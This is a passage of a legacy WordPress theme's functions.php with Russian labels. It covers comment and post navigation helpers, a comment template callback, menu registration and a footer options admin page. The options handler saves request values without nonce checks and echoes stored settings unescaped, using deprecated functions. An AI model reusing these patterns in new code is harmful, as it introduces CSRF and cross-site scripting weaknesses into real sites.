		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Edit', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
